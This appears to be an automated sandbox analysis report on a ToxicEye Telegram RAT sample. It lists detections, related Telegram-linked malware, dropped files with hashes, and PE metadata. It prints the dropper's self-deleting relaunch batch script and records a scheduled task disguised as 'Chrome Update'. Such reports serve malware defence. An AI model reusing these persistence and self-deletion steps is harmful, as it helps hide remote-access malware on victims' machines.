Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Critical Process Termination
Sample name:	dAIJ6g47mZ.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	638f25147bfea8cdd2c8e010682388d64868d77e236995972059e7fcbcc6a517
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/13@7/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 8 Number of non-executed functions: 1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:19:44	Task Scheduler	Run new task: Chrome Update path: C:\Users\ToxicEye\rat.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	FATURA.pdf.exe	Get hash	malicious	GuLoader	Browse
	5qgMqpI3O3.exe	Get hash	malicious	XClient Stealer	Browse
	VXl6IxOofO.exe	Get hash	malicious	Gurcu Stealer	Browse
	Order_No_131223AT_ZIRAAT_BANKASI.exe	Get hash	malicious	AgentTesla	Browse
	qgi.exe	Get hash	malicious	AgentTesla	Browse
	fDPrTCclm5.exe	Get hash	malicious	DCRat	Browse
	SecuriteInfo.com.Python.Agent-LZ.32136.12177.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Agent-LZ.23397.22787.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.12595.16422.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.23182.21250.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	FATURA.pdf.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	5qgMqpI3O3.exe	Get hash	malicious	XClient Stealer	Browse	149.154.167.220
	VXl6IxOofO.exe	Get hash	malicious	Gurcu Stealer	Browse	149.154.167.220
	Order_No_131223AT_ZIRAAT_BANKASI.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	qgi.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	fDPrTCclm5.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	SecuriteInfo.com.Python.Agent-LZ.32136.12177.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Python.Agent-LZ.23397.22787.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win32.TrojanX-gen.12595.16422.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.23182.21250.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Chrome.apk	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Fabookie, Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse	149.154.167.99
	FATURA.pdf.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	toolspub1.exe	Get hash	malicious	LummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer	Browse	149.154.167.99
	BbTm8TrVqb.exe	Get hash	malicious	LummaC, AsyncRAT, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer	Browse	149.154.167.99
	5qgMqpI3O3.exe	Get hash	malicious	XClient Stealer	Browse	149.154.167.220
	buildz.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	149.154.167.99
	toolspub1.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine	Browse	149.154.167.99
	VXl6IxOofO.exe	Get hash	malicious	Gurcu Stealer	Browse	149.154.167.220
	Order_No_131223AT_ZIRAAT_BANKASI.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	in_77427742377427742.js	Get hash	malicious	Unknown	Browse	149.154.167.220
	in_77427742377427742.js	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	RedLine	Browse	149.154.167.220
	MACHINE_QUOTATION.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PO#SC00487.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Win32.InjectorX-gen.1897.1183.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	nVX7Zrz0.posh.ps1	Get hash	malicious	PoshC2	Browse	149.154.167.220
	HBKMC_56376_E127-EXP-MCE-231127.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SOA_Attached.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	INVOICE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rat.exe_53adaffc35a7cdb46b6e8a658446411b4952e3_76110556_827965d9-647e-4f95-ae50-38f14b6eb5a7\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.436425051284702
Encrypted:	false
SSDEEP:	384:w6qUtTsTE5cj4Wa4ZuDEwzuiFUY4lO8/R:NqUsE5cjNaKBwzuiFUY4lO8
MD5:	6087A1F3EE0C24A82E3D69AB7CFD79C0
SHA1:	9FA2F7317242594E458F04B69F075EDB1B2E47EC
SHA-256:	BCBEFD785DD9BF2FF935461F684EF96847E2FD5F350CBB4261C794D35F80D21E
SHA-512:	A744B98CB04F1C2B55792FFE7ACE598B438C9CE89D3101F349AADC12DD6634B2A655D2881794EAC2F1D239678D005B0CEFF0F64222D18350D696EF556FCE2A1C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.0.4.8.5.9.9.1.6.8.7.7.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.7.9.6.5.d.9.-.6.4.7.e.-.4.f.9.5.-.a.e.5.0.-.3.8.f.1.4.b.6.e.b.5.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.2.2.e.6.9.6.-.c.e.6.6.-.4.5.8.3.-.8.0.2.e.-.6.4.d.f.c.2.4.c.a.f.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.a.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.e.l.e.g.r.a.m.R.A.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.2.8.-.0.0.0.1.-.0.0.1.5.-.3.4.0.0.-.a.7.7.2.f.6.4.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.c.7.0.e.0.3.4.1.a.a.0.4.3.5.7.d.0.3.2.3.0.b.5.5.e.4.c.a.4.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.e.7.9.7.2.c.9.4.2.7.1.7.3.e.0.a.a.d.8.e.4.2.5.2.d.1.b.0.7.1.d.5.9.7.8.b.a.4.1.!.r.a.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.7.8././.0.3././.1.0.:.1.4.:.2.4.:.5.0.!.0.!.r.a.t...e.x.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER284.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Tue Jan 23 12:19:52 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	687952
Entropy (8bit):	3.211364987680842
Encrypted:	false
SSDEEP:	6144:bSLS0p0ejzlHCO5+qgIW+M3QwofQNhJFRFNFXGFiF4QXAUfvykoM:bSLpGqI+wQrfohJFRFNFXGFiF4QXAum
MD5:	D6F259915638B2F98B77F638CB68BD5D
SHA1:	AE16005D1BB6FBDC0DD63386EAC02D68200181E2
SHA-256:	8F89C8B42D40B66640F7ED5BFEA30CB6468E7E59636977D203F83C1AAA09CA96
SHA-512:	D2983A1344663A1C816DE7DEC40406EB2686C4ACE90023D6B06F5DD600F73A1657992527D6EDA2766BBB634D7D084A5C5EECDE648ABF74B17CE0EA1E158C4930
Malicious:	false
Preview:	MDMP..a..... ........e.........................+..........<....6..........47.......Z..............l.......8...........T...........Pt...............L...........N..............................................................................eJ......pO......Lw......................T.......(....e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER573.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7126
Entropy (8bit):	3.7184114723781843
Encrypted:	false
SSDEEP:	192:R6l7wVeJpmgxXYk4jeB4tklprT89bwlgafcSdm:R6lXJp5hYkNB4tk8Kdf8
MD5:	49BC3862E05910DAEE980BD86FC3D383
SHA1:	FB2D50FAB1159379CB8460154D36943FA1181ADD
SHA-256:	1C7AB19EB9C76FF0AABF13E83CFBABC5A64838BEF83BDD0B672803B87F2511DB
SHA-512:	AFCD7420C41C5CE23DDBBB5755D6566539CD3634440EB744DD7831C0580CF7AC4BA836511C03250ABDDF6D9EB057CCD0C06FDE978DEB404A23C3879B208D0112
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A3.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4894
Entropy (8bit):	4.441494815128964
Encrypted:	false
SSDEEP:	48:cvIwWl8zsuJg771I9pW/FHVVWpW8VYOYm8M4JLSFHyq8vRmW5mEBSAd:uIjfkI72W/F27VKJIWyEcAd
MD5:	F0C13322047970AAD1CD6127C8BE65D2
SHA1:	4E2358FF299D3C9D7666E47E5D65B54DC9AFBC1D
SHA-256:	D72C80B6544B8A65260F5C12F7008AAFD6F6961BC2AEC3963B8F36B8AD174973
SHA-512:	399E57BDACEA5A831ADCF468D3B79B4890BD3811258BE1004676002F4920D34A8FBDDE9CCFF53FCA2CD27E6BF8ABE9E4D5EEA27210904958B9E72A5FC74090B7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="161482" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\ToxicEye\rat.exe

Download File

Process:	C:\Users\user\Desktop\dAIJ6g47mZ.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	114176
Entropy (8bit):	5.662688913298548
Encrypted:	false
SSDEEP:	1536:Ui+bobMsBnqLoM91qQIwnN5Qt5QJbzPbhDqI68QWGzCrAZu6+25a:mbobMsBnwouY8ZbxqH8QWGzCrAZu6Za
MD5:	B4354EE75E6D043AD4BA2C6D2DF30A6E
SHA1:	AE7972C9427173E0AAD8E4252D1B071D5978BA41
SHA-256:	638F25147BFEA8CDD2C8E010682388D64868D77E236995972059E7FCBCC6A517
SHA-512:	949B7C31BFAF6AEEAF319E0A651923FCC2C929A97D8AF7C9B7B488F33D3FEF386F7178A7D5DAB5EA256CB354ECCC0FF9995BD10CB5DB9D1C3224791DCE8B7FBB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security Rule: JoeSecurity_ToxicEye, Description: Yara detected ToxicEye, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 77%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2............."...0.............V.... ........@.. ....................... ............`.....................................O...................................D...8............................................ ............... ..H............text...\|.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................7.......H.......T...........a..........................................................r...p...................6.r...p.o............"..s}...>..s....%.}_........0..........s .........o.....o!.....0..........s .........o.....o!.....su...2.o....sq...2.o....sk.......0../.......#..........o.... ....(".....(#...,..#........N...("...($...o....".o"...i&..lo#...".o"...k&..lo#.......0.."..........o......(%...,...o....(&......Z..-.r...p+.r...po........0..

C:\Users\ToxicEye\rat.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\dAIJ6g47mZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dAIJ6g47mZ.exe.log

Download File

Process:	C:\Users\user\Desktop\dAIJ6g47mZ.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	5.364175471524945
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAu
MD5:	F3E4B39D94849B092D4BB1072DD5F435
SHA1:	0D7C96B89B2901834CF0FF5EC99579B8DE65DD72
SHA-256:	BD51FDC1EF08B5BF92E800C79A01CD5783EA62FA3240505AC6AC8B5969782046
SHA-512:	C5B7C6D226EFDD26D14F55EFF6C5714ACF7452B70F29F43DC1E2BFEDA58F5883878EAFFE2B3AF060C656EA7BF99B94D9B3D3E22EF847625D5B78F60DD9DC1733
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rat.exe.log

Download File

Process:	C:\Users\ToxicEye\rat.exe
File Type:	CSV text
Category:	modified
Size (bytes):	660
Entropy (8bit):	5.38575581059626
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1BakvoDLI4MWuPakEOsk7v:ML9E4KQ71qE4GIs0E4KD
MD5:	E918A9A81162ACCFD3E06E02E11CB6C8
SHA1:	10F02DAEDB20582256A5601EE8898CFA8DC2BDD5
SHA-256:	912110B9095CDC4B124444955DD3ABAEFFB7C309A242A4B05299A26EC9920A21
SHA-512:	78D9CABEFE698E54197D7D03ABC3AC36F3AAA2DE80CD79AD780B67324F36D7CA3560F642873E8C20F2BB27A9C892D9A2F21898E4B469FAFE35BA0FAEE8A7936A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat

Download File

Process:	C:\Users\user\Desktop\dAIJ6g47mZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	187
Entropy (8bit):	5.035509335898349
Encrypted:	false
SSDEEP:	3:Qk7wDumh6ckanDFSaskUGKoQRw+HREzfyOH+S/bmMNMOhCJsw+HROirH9XEOASn:QkEXnIBdGKoQRw+HGnHNmUMsCKw+Hs8X
MD5:	B81A9F62E4C2D0CA213A1BB3BE0A2F68
SHA1:	7153764354586BC3D5E6AD975651B2B7114C1069
SHA-256:	8A99F144454AD261034F5DF966E30B751319175C0A0BA40B50B02C78E30AC542
SHA-512:	E69AACC45AB3F78D814C0F7FFF8C31B8DFF875B0023696327B8A79C578B49AA9E4E416AED94414B1FCF5F846CB94BEF62C8C91585D899876AD301DB965FEF8A9
Malicious:	false
Preview:	:l..Tasklist /fi "PID eq 2960" \| find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Del "dAIJ6g47mZ.exe"..Cd "C:\Users\ToxicEye"..Timeout /T 1 /Nobreak..Start "" "rat.exe"..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468600219537695
Encrypted:	false
SSDEEP:	6144:/zZfpi6ceLPx9skLmb0fWZWSP3aJG8nAgeiJRMMhA2zX4WABluuNBjDH5Sk:rZHtWZWOKnMM6bFpjj4k
MD5:	D99BA7462D6203578EAEE0AD13693DAE
SHA1:	9C4155E9C2DA6AD3F8935AAFD98FE88D80CE812E
SHA-256:	DAF4DBF1DDD62BFDDD4AF4F997D89492AA1164629B0C1301A57768A2D572FC95
SHA-512:	B3AA3BAF5EA76B12A4055E5AFA0492AA54CD5C02C60C5F2308A9741C7F6CB4439136A435953046DFC50DB35DB765F52551E4149AFE147F64EE4F8D09298F9A91
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...w.M.................................................................................................................................................................................................................................................................................................................................................C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\ToxicEye\rat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.493518824601853
Encrypted:	false
SSDEEP:	3:xI+MLCOKJcLBKL+zFkmL2KGpByCRyn:DOKoRF/G2CRyn
MD5:	0568E1D12CAFD998C97DBD9F453383BB
SHA1:	FCA14D1C55AAC0CE9A77CC395BCC6281FB97E443
SHA-256:	6CED86323ED187F6DA367851A00A0E20F67E95F904B78D1C659ED70620270C26
SHA-512:	8256508E7BD032030AC2583A2F57257EE109986789957ABE98412BB716BA77FA5E4A8906C6A105CAFB328EB3B8DC10301E46B9C98520D9FEAA98640EF03EA475
Malicious:	false
Preview:	[+] Hiding console window..[?] Already running 1 copy of the program..

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.662688913298548
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	dAIJ6g47mZ.exe
File size:	114'176 bytes
MD5:	b4354ee75e6d043ad4ba2c6d2df30a6e
SHA1:	ae7972c9427173e0aad8e4252d1b071d5978ba41
SHA256:	638f25147bfea8cdd2c8e010682388d64868d77e236995972059e7fcbcc6a517
SHA512:	949b7c31bfaf6aeeaf319e0a651923fcc2c929a97d8af7c9b7b488f33d3fef386f7178a7d5dab5ea256cb354eccc0ff9995bd10cb5db9d1c3224791dce8b7fbb
SSDEEP:	1536:Ui+bobMsBnqLoM91qQIwnN5Qt5QJbzPbhDqI68QWGzCrAZu6+25a:mbobMsBnwouY8ZbxqH8QWGzCrAZu6Za
TLSH:	C8B32D1C37FC1A19F7FF5B7978B261194B72B867A932D70D18D5188D08B2B818E11BA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2............."...0.............V.... ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x41d356
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xCB7FC332 [Thu Mar 10 14:24:50 2078 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
dec ecx
jbe 00007FDB350120E3h
outsb
and byte ptr [ebp+65h], cl
jbe 00007FDB350120E8h
jbe 00007FDB35012084h
add byte ptr [eax], al
add byte ptr [ecx], al
add al, byte ptr [ebx]
add al, 06h
or byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d303	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e000	0x5bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x20000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1d244	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
